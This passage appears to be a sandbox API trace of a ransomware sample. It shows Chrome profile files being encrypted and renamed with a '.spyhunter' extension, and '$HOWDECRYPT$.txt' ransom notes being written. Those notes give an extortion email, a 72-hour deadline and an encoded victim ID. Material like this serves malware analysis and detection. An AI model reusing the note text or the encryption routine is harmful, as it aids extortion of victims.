HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT") returned 145 [0156.612] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0156.612] GetProcessHeap () returned 0x2c0000 [0156.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.612] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec6c*=0x10, lpOverlapped=0x0) returned 1 [0156.612] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.613] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec6c*=0x10, lpOverlapped=0x0) returned 1 [0156.613] GetProcessHeap () returned 0x2c0000 [0156.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.613] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.613] WriteFile (in: hFile=0x178, lpBuffer=0x248ecac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x248ecac*, lpNumberOfBytesWritten=0x248ec6c*=0x4, lpOverlapped=0x0) returned 1 [0156.613] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec6c*=0x30, lpOverlapped=0x0) returned 1 [0156.613] CloseHandle (hObject=0x178) returned 1 [0156.613] GetProcessHeap () returned 0x2c0000 [0156.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.613] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.spyhunter") returned 155 [0156.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current.spyhunter")) returned 1 [0156.614] GetProcessHeap () returned 0x2c0000 [0156.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.614] GetProcessHeap () returned 0x2c0000 [0156.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.614] GetProcessHeap () returned 0x2c0000 [0156.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf01f0 | out: hHeap=0x2c0000) returned 1 [0156.614] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ecb0 | out: pbBuffer=0x248ecb0) returned 1 [0156.614] GetProcessHeap () returned 0x2c0000 [0156.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.615] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eca8*=0x30) returned 1 [0156.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log") returned 148 [0156.615] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0156.615] GetProcessHeap () returned 0x2c0000 [0156.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.616] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec6c*=0x0, lpOverlapped=0x0) returned 1 [0156.616] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.616] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec6c*=0x0, lpOverlapped=0x0) returned 1 [0156.616] GetProcessHeap () returned 0x2c0000 [0156.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.616] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.616] WriteFile (in: hFile=0x178, lpBuffer=0x248ecac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x248ecac*, lpNumberOfBytesWritten=0x248ec6c*=0x4, lpOverlapped=0x0) returned 1 [0156.617] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec6c*=0x30, lpOverlapped=0x0) returned 1 [0156.617] CloseHandle (hObject=0x178) returned 1 [0156.617] GetProcessHeap () returned 0x2c0000 [0156.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.617] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.spyhunter") returned 158 [0156.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.spyhunter")) returned 1 [0156.618] GetProcessHeap () returned 0x2c0000 [0156.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.618] GetProcessHeap () returned 0x2c0000 [0156.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.618] GetProcessHeap () returned 0x2c0000 [0156.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f25e50 | out: hHeap=0x2c0000) returned 1 [0156.618] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eca8 | out: pbBuffer=0x248eca8) returned 1 [0156.618] GetProcessHeap () returned 0x2c0000 [0156.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.619] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eca0*=0x30) returned 1 [0156.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.619] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp") returned 102 [0156.619] StrStrW (lpFirst="A058.tmp", lpSrch=".txt") returned 0x0 [0156.619] GetProcessHeap () returned 0x2c0000 [0156.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.619] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec64*=0x0, lpOverlapped=0x0) returned 1 [0156.619] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.619] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec64*=0x0, lpOverlapped=0x0) returned 1 [0156.619] GetProcessHeap () returned 0x2c0000 [0156.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.620] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.620] WriteFile (in: hFile=0x178, lpBuffer=0x248eca4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec64, lpOverlapped=0x0 | out: lpBuffer=0x248eca4*, lpNumberOfBytesWritten=0x248ec64*=0x4, lpOverlapped=0x0) returned 1 [0156.620] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec64, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec64*=0x30, lpOverlapped=0x0) returned 1 [0156.620] CloseHandle (hObject=0x178) returned 1 [0156.621] GetProcessHeap () returned 0x2c0000 [0156.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.621] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp.spyhunter") returned 112 [0156.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp.spyhunter")) returned 1 [0156.625] GetProcessHeap () returned 0x2c0000 [0156.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.626] GetProcessHeap () returned 0x2c0000 [0156.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.626] GetProcessHeap () returned 0x2c0000 [0156.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29d18 | out: hHeap=0x2c0000) returned 1 [0156.626] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eca8 | out: pbBuffer=0x248eca8) returned 1 [0156.626] GetProcessHeap () returned 0x2c0000 [0156.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.626] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eca0*=0x30) returned 1 [0156.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache") returned 102 [0156.634] StrStrW (lpFirst="History Provider Cache", lpSrch=".txt") returned 0x0 [0156.637] GetProcessHeap () returned 0x2c0000 [0156.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.637] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec64*=0x142f, lpOverlapped=0x0) returned 1 [0156.814] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffebd1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.814] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x142f, lpNumberOfBytesWritten=0x248ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec64*=0x142f, lpOverlapped=0x0) returned 1 [0156.815] GetProcessHeap () returned 0x2c0000 [0156.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.815] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.815] WriteFile (in: hFile=0xa0, lpBuffer=0x248eca4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec64, lpOverlapped=0x0 | out: lpBuffer=0x248eca4*, lpNumberOfBytesWritten=0x248ec64*=0x4, lpOverlapped=0x0) returned 1 [0156.815] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec64, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec64*=0x30, lpOverlapped=0x0) returned 1 [0156.815] CloseHandle (hObject=0xa0) returned 1 [0156.815] GetProcessHeap () returned 0x2c0000 [0156.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.815] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache.spyhunter") returned 112 [0156.815] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache.spyhunter")) returned 1 [0156.816] GetProcessHeap () returned 0x2c0000 [0156.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.816] GetProcessHeap () returned 0x2c0000 [0156.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.816] GetProcessHeap () returned 0x2c0000 [0156.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29e30 | out: hHeap=0x2c0000) returned 1 [0156.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.819] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.819] WriteFile (in: hFile=0x178, lpBuffer=0x248ebd7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed00, lpOverlapped=0x0 | out: lpBuffer=0x248ebd7*, lpNumberOfBytesWritten=0x248ed00*=0x127, lpOverlapped=0x0) returned 1 [0156.819] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.819] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed00*=0x2ac, lpOverlapped=0x0) returned 1 [0156.820] CloseHandle (hObject=0x178) returned 1 [0156.820] GetProcessHeap () returned 0x2c0000 [0156.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a7c0 | out: hHeap=0x2c0000) returned 1 [0156.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.821] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.821] WriteFile (in: hFile=0x178, lpBuffer=0x248ebd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x248ebd3*, lpNumberOfBytesWritten=0x248ecfc*=0x127, lpOverlapped=0x0) returned 1 [0156.821] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.821] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecfc*=0x2ac, lpOverlapped=0x0) returned 1 [0156.822] CloseHandle (hObject=0x178) returned 1 [0156.822] GetProcessHeap () returned 0x2c0000 [0156.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3bd8 | out: hHeap=0x2c0000) returned 1 [0156.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.823] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.823] WriteFile (in: hFile=0x178, lpBuffer=0x248ebcf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecf8, lpOverlapped=0x0 | out: lpBuffer=0x248ebcf*, lpNumberOfBytesWritten=0x248ecf8*=0x127, lpOverlapped=0x0) returned 1 [0156.824] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.824] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecf8*=0x2ac, lpOverlapped=0x0) returned 1 [0156.824] CloseHandle (hObject=0x178) returned 1 [0156.824] GetProcessHeap () returned 0x2c0000 [0156.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1ca90 | out: hHeap=0x2c0000) returned 1 [0156.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.846] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your 